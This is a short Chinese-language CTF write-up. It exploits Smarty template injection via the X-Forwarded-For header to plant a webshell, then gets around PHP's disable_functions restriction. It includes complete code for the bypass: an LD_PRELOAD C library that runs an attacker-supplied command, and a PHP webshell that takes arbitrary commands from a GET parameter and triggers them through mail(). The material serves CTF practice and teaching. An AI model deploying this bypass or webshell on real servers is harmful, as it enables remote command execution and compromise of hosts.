smart

  • 模板注入
  • mail
  • LD_PRELOAD

页面下方写有Smarty字样,所以可能存在模板注入漏洞,经过测试漏洞点在xff处,如下写入webshell

image-20190701135415095

发现open_basedir被限制为/var/www/html/tmp目录,而disable_funcitions如下:

image-20190701143905275

但是mailputenv没有被禁用,于是使用LD_PRELOAD来进行突破,C语言代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#define _GNU_SOURCE

#include <stdlib.h>
#include <stdio.h>
#include <string.h>


extern char** environ;

__attribute__ ((__constructor__)) void preload (void)
{
    // get command line options and arg
    const char* cmdline = getenv("EVIL_CMDLINE");

    // unset environment variable LD_PRELOAD.
    // unsetenv("LD_PRELOAD") no effect on some 
    // distribution (e.g., centos), I need crafty trick.
    int i;
    for (i = 0; environ[i]; ++i) {
            if (strstr(environ[i], "LD_PRELOAD")) {
                    environ[i][0] = '\0';
            }
    }

    // executive command
    system(cmdline);
}

文件名为bypass_disablefunc.c,使用gcc -shared -fPIC bypass_disablefunc.c -o bypass_disablefunc_x64.so,在linux下编译生成so文件,上传so文件和对应如下代码

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
    echo "<p> <b>example</b>: http://site.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so </p>";
    $cmd = $_GET["cmd"];
    $out_path = $_GET["outpath"];
    $evil_cmdline = $cmd . " > " . $out_path . " 2>&1";
    echo "<p> <b>cmdline</b>: " . $evil_cmdline . "</p>";
    putenv("EVIL_CMDLINE=" . $evil_cmdline);
    $so_path = $_GET["sopath"];
    putenv("LD_PRELOAD=" . $so_path);
    mail("", "", "","");
    echo "<p> <b>output</b>: <br />" . nl2br(file_get_contents($out_path)) . "</p>"; 
    unlink($out_path);
?>

执行得到flag:

image-20190701144646396